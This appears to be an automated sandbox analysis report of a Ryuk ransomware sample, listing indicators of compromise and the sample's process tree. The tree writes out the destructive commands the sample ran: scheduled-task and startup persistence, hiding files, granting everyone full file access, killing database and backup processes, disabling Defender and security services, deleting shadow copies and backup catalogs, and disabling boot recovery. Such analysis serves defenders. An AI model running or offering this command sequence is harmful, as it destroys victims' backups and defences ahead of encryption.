928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1552	taskkill.exe
Token: SeDebugPrivilege	1996	taskkill.exe
Token: SeIncreaseQuotaPrivilege	740	WMIC.exe
Token: SeSecurityPrivilege	740	WMIC.exe
Token: SeTakeOwnershipPrivilege	740	WMIC.exe
Token: SeLoadDriverPrivilege	740	WMIC.exe
Token: SeSystemProfilePrivilege	740	WMIC.exe
Token: SeSystemtimePrivilege	740	WMIC.exe
Token: SeProfSingleProcessPrivilege	740	WMIC.exe
Token: SeIncBasePriorityPrivilege	740	WMIC.exe
Token: SeCreatePagefilePrivilege	740	WMIC.exe
Token: SeBackupPrivilege	740	WMIC.exe
Token: SeRestorePrivilege	740	WMIC.exe
Token: SeShutdownPrivilege	740	WMIC.exe
Token: SeDebugPrivilege	740	WMIC.exe
Token: SeSystemEnvironmentPrivilege	740	WMIC.exe
Token: SeRemoteShutdownPrivilege	740	WMIC.exe
Token: SeUndockPrivilege	740	WMIC.exe
Token: SeManageVolumePrivilege	740	WMIC.exe
Token: 33	740	WMIC.exe
Token: 34	740	WMIC.exe
Token: 35	740	WMIC.exe
Token: SeIncreaseQuotaPrivilege	740	WMIC.exe
Token: SeSecurityPrivilege	740	WMIC.exe
Token: SeTakeOwnershipPrivilege	740	WMIC.exe
Token: SeLoadDriverPrivilege	740	WMIC.exe
Token: SeSystemProfilePrivilege	740	WMIC.exe
Token: SeSystemtimePrivilege	740	WMIC.exe
Token: SeProfSingleProcessPrivilege	740	WMIC.exe
Token: SeIncBasePriorityPrivilege	740	WMIC.exe
Token: SeCreatePagefilePrivilege	740	WMIC.exe
Token: SeBackupPrivilege	740	WMIC.exe
Token: SeRestorePrivilege	740	WMIC.exe
Token: SeShutdownPrivilege	740	WMIC.exe
Token: SeDebugPrivilege	740	WMIC.exe
Token: SeSystemEnvironmentPrivilege	740	WMIC.exe
Token: SeRemoteShutdownPrivilege	740	WMIC.exe
Token: SeUndockPrivilege	740	WMIC.exe
Token: SeManageVolumePrivilege	740	WMIC.exe
Token: 33	740	WMIC.exe
Token: 34	740	WMIC.exe
Token: 35	740	WMIC.exe
Token: SeBackupPrivilege	1444	vssvc.exe
Token: SeRestorePrivilege	1444	vssvc.exe
Token: SeAuditPrivilege	1444	vssvc.exe
Token: SeDebugPrivilege	1408	taskkill.exe
Token: SeDebugPrivilege	1292	taskkill.exe
Token: SeDebugPrivilege	1716	taskkill.exe
Token: SeSecurityPrivilege	1220	wevtutil.exe
Token: SeBackupPrivilege	1220	wevtutil.exe
Token: SeSecurityPrivilege	2024	wevtutil.exe
Token: SeBackupPrivilege	2024	wevtutil.exe
Token: SeSecurityPrivilege	1040	wevtutil.exe
Token: SeBackupPrivilege	1040	wevtutil.exe
Token: SeSecurityPrivilege	1596	wevtutil.exe
Token: SeBackupPrivilege	1596	wevtutil.exe
Token: SeSecurityPrivilege	1768	wevtutil.exe
Token: SeBackupPrivilege	1768	wevtutil.exe
Token: SeSecurityPrivilege	812	wevtutil.exe
Token: SeBackupPrivilege	812	wevtutil.exe
Token: SeSecurityPrivilege	576	wevtutil.exe
Token: SeBackupPrivilege	576	wevtutil.exe
Token: SeSecurityPrivilege	760	wevtutil.exe
Token: SeBackupPrivilege	760	wevtutil.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 928 wrote to memory of 868	928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	28
PID 928 wrote to memory of 868	928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	28
PID 928 wrote to memory of 868	928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	28
PID 868 wrote to memory of 860	868	cmd.exe	29
PID 868 wrote to memory of 860	868	cmd.exe	29
PID 868 wrote to memory of 860	868	cmd.exe	29
PID 928 wrote to memory of 1456	928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	30
PID 928 wrote to memory of 1456	928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	30
PID 928 wrote to memory of 1456	928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	30
PID 928 wrote to memory of 460	928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	31
PID 928 wrote to memory of 460	928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	31
PID 928 wrote to memory of 460	928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	31
PID 928 wrote to memory of 516	928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	32
PID 928 wrote to memory of 516	928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	32
PID 928 wrote to memory of 516	928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	32
PID 516 wrote to memory of 652	516	cmd.exe	33
PID 516 wrote to memory of 652	516	cmd.exe	33
PID 516 wrote to memory of 652	516	cmd.exe	33
PID 928 wrote to memory of 568	928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	34
PID 928 wrote to memory of 568	928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	34
PID 928 wrote to memory of 568	928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	34
PID 568 wrote to memory of 1452	568	cmd.exe	35
PID 568 wrote to memory of 1452	568	cmd.exe	35
PID 568 wrote to memory of 1452	568	cmd.exe	35
PID 928 wrote to memory of 1188	928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	36
PID 928 wrote to memory of 1188	928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	36
PID 928 wrote to memory of 1188	928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	36
PID 1188 wrote to memory of 2024	1188	cmd.exe	37
PID 1188 wrote to memory of 2024	1188	cmd.exe	37
PID 1188 wrote to memory of 2024	1188	cmd.exe	37
PID 928 wrote to memory of 1964	928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	38
PID 928 wrote to memory of 1964	928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	38
PID 928 wrote to memory of 1964	928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	38
PID 1964 wrote to memory of 1876	1964	cmd.exe	39
PID 1964 wrote to memory of 1876	1964	cmd.exe	39
PID 1964 wrote to memory of 1876	1964	cmd.exe	39
PID 928 wrote to memory of 1768	928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	40
PID 928 wrote to memory of 1768	928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	40
PID 928 wrote to memory of 1768	928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	40
PID 1768 wrote to memory of 812	1768	cmd.exe	41
PID 1768 wrote to memory of 812	1768	cmd.exe	41
PID 1768 wrote to memory of 812	1768	cmd.exe	41
PID 928 wrote to memory of 1544	928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	42
PID 928 wrote to memory of 1544	928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	42
PID 928 wrote to memory of 1544	928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	42
PID 1544 wrote to memory of 672	1544	cmd.exe	43
PID 1544 wrote to memory of 672	1544	cmd.exe	43
PID 1544 wrote to memory of 672	1544	cmd.exe	43
PID 928 wrote to memory of 1476	928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	44
PID 928 wrote to memory of 1476	928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	44
PID 928 wrote to memory of 1476	928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	44
PID 1476 wrote to memory of 1100	1476	cmd.exe	45
PID 1476 wrote to memory of 1100	1476	cmd.exe	45
PID 1476 wrote to memory of 1100	1476	cmd.exe	45
PID 928 wrote to memory of 1604	928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	47
PID 928 wrote to memory of 1604	928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	47
PID 928 wrote to memory of 1604	928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	47
PID 1604 wrote to memory of 1436	1604	cmd.exe	48
PID 1604 wrote to memory of 1436	1604	cmd.exe	48
PID 1604 wrote to memory of 1436	1604	cmd.exe	48
PID 1604 wrote to memory of 1552	1604	cmd.exe	49
PID 1604 wrote to memory of 1552	1604	cmd.exe	49
PID 1604 wrote to memory of 1552	1604	cmd.exe	49
PID 1100 wrote to memory of 1480	1100	cmd.exe	51

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 5 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
1452	attrib.exe
812	attrib.exe
672	attrib.exe
1248	attrib.exe
1684	attrib.exe

C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
"C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe"
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:928
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:868
- - C:\Windows\system32\schtasks.exe
    schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
    3⤵
    - Creates scheduled task(s)
    PID:860
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
  2⤵
  - Drops startup file
  PID:1456
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
  2⤵
  PID:460
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:516
- - C:\Windows\system32\schtasks.exe
    schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
    3⤵
    - Creates scheduled task(s)
    PID:652
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:568
- - C:\Windows\system32\attrib.exe
    attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
    3⤵
    - Drops startup file
    - Views/modifies file attributes
    PID:1452
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe" /RU SYSTEM /RL HIGHEST /F
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1188
- - C:\Windows\system32\schtasks.exe
    schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe" /RU SYSTEM /RL HIGHEST /F
    3⤵
    - Creates scheduled task(s)
    PID:2024
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe" /F
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1964
- - C:\Windows\system32\schtasks.exe
    schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe" /F
    3⤵
    - Creates scheduled task(s)
    PID:1876
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1768
- - C:\Windows\system32\attrib.exe
    attrib +h +s ryuk.exe
    3⤵
    - Views/modifies file attributes
    PID:812
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1544
- - C:\Windows\system32\attrib.exe
    attrib +h +s C:\ProgramData\ryuk.exe
    3⤵
    - Views/modifies file attributes
    PID:672
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1476
- - C:\Windows\system32\cmd.exe
    cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1100
  - - C:\Windows\system32\icacls.exe
      icacls * /grant Everyone:(OI)(CI)F /T /C /Q
      4⤵
      Modifies file permissions
      PID:1480
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1604
- - C:\Windows\system32\cmd.exe
    cmd.exe /c taskkill /t /f /im sql*
    3⤵
    PID:1436
  - - C:\Windows\system32\taskkill.exe
      taskkill /t /f /im sql*
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1996
- - C:\Windows\system32\taskkill.exe
    taskkill /f /t /im veeam*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1552
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
  2⤵
  PID:1664
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
    3⤵
    PID:1328
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog1
  2⤵
  PID:1872
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog2
  2⤵
  PID:1108
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID
  2⤵
  PID:944
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog1
  2⤵
  PID:1004
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "
  2⤵
  PID:1752
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
  2⤵
  PID:1756
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    PID:1420
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
  2⤵
  PID:1192
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:868
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
  2⤵
  PID:1620
- - C:\Windows\system32\reg.exe
    reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
    3⤵
    PID:1612
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
  2⤵
  PID:460
- - C:\Windows\system32\reg.exe
    reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
    3⤵
    PID:680
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start cmd.exe /c "C:\ProgramData\RyukReadMe.txt " && exit
  2⤵
  PID:460
- - C:\Windows\system32\cmd.exe
    cmd.exe /c "C:\ProgramData\RyukReadMe.txt "
    3⤵
    PID:1924
  - - C:\Windows\system32\NOTEPAD.EXE
      "C:\Windows\system32\NOTEPAD.EXE" C:\ProgramData\RyukReadMe.txt
      4⤵
      Opens file in notepad (likely ransom note)
      PID:1652
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start cmd.exe /c vssadmin Delete Shadows /All /Quiet
  2⤵
  PID:1580
- - C:\Windows\system32\cmd.exe
    cmd.exe /c vssadmin Delete Shadows /All /Quiet
    3⤵
    PID:268
  - - C:\Windows\system32\vssadmin.exe
      vssadmin Delete Shadows /All /Quiet
      4⤵
      Interacts with shadow copies
      PID:1920
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start cmd.exe /c wmic shadowcopy delete
  2⤵
  PID:2024
- - C:\Windows\system32\cmd.exe
    cmd.exe /c wmic shadowcopy delete
    3⤵
    PID:1448
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic shadowcopy delete
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:740
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures
  2⤵
  PID:1880
- - C:\Windows\system32\cmd.exe
    cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures
    3⤵
    PID:1228
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /set {default} boostatuspolicy ignoreallfailures
      4⤵
      Modifies boot configuration data using bcdedit
      PID:2004
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} recoveryenabled no
  2⤵
  PID:364
- - C:\Windows\system32\cmd.exe
    cmd.exe /c bcdedit /set {default} recoveryenabled no
    3⤵
    PID:1828
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /set {default} recoveryenabled no
      4⤵
      Modifies boot configuration data using bcdedit
      PID:1108
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start cmd.exe /c wbadmin delete catalog -quiet/
  2⤵
  PID:1908
- - C:\Windows\system32\cmd.exe
    cmd.exe /c wbadmin delete catalog -quiet/
    3⤵
    PID:296
  - - C:\Windows\system32\wbadmin.exe
      wbadmin delete catalog -quiet/
      4⤵
      Deletes backup catalog
      Drops file in Windows directory
      PID:1896
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop avpsus /y
  2⤵
  PID:272
- - C:\Windows\system32\net.exe
    net stop avpsus /y
    3⤵
    PID:2044
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop avpsus /y
      4⤵
      PID:1064
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop McAfeeDLPAgentService /y
  2⤵
  PID:1712
- - C:\Windows\system32\net.exe
    net stop McAfeeDLPAgentService /y
    3⤵
    PID:1988
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
      4⤵
      PID:1812
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop mfewc /y
  2⤵
  PID:1716
- - C:\Windows\system32\net.exe
    net stop mfewc /y
    3⤵
    PID:476
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop mfewc /y
      4⤵
      PID:668
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop BMR Boot Service /y
  2⤵
  PID:280
- - C:\Windows\system32\net.exe
    net stop BMR Boot Service /y
    3⤵
    PID:1296
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BMR Boot Service /y
      4⤵
      PID:652
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop NetBackup BMR MTFTP Service /y
  2⤵
  PID:1468
- - C:\Windows\system32\net.exe
    net stop NetBackup BMR MTFTP Service /y
    3⤵
    PID:2024
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
      4⤵
      PID:1768
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY start=disabled
  2⤵
  PID:672
- - C:\Windows\system32\sc.exe
    sc config SQLTELEMETRY start=disabled
    3⤵
    - Launches sc.exe
    PID:452
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:1880
- - C:\Windows\system32\sc.exe
    sc config SQLTELEMETRY$ECWDB2 start= disabled
    3⤵
    - Launches sc.exe
    PID:968
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc config SQLWriter start= disabled
  2⤵
  PID:360
- - C:\Windows\system32\sc.exe
    sc config SQLWriter start= disabled
    3⤵
    - Launches sc.exe
    PID:364
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc config SstpSvc start= disabled
  2⤵
  PID:1100
- - C:\Windows\system32\sc.exe
    sc config SstpSvc start= disabled
    3⤵
    - Launches sc.exe
    PID:1980
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /IM mspub.exe /F
  2⤵
  PID:1828
- - C:\Windows\system32\taskkill.exe
    taskkill /IM mspub.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1408
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /IM mydesktopqos.exe /F
  2⤵
  PID:1244
- - C:\Windows\system32\taskkill.exe
    taskkill /IM mydesktopqos.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1292
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /IM mydesktopservice.exe /F
  2⤵
  PID:476
- - C:\Windows\system32\taskkill.exe
    taskkill /IM mydesktopservice.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1716
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet
  2⤵
  PID:760
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:1168
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
  2⤵
  PID:1804
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:968
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
  2⤵
  PID:844
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:1896
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
  2⤵
  PID:1212
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1480
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
  2⤵
  PID:1704
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1408
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
  2⤵
  PID:1656
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1872
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
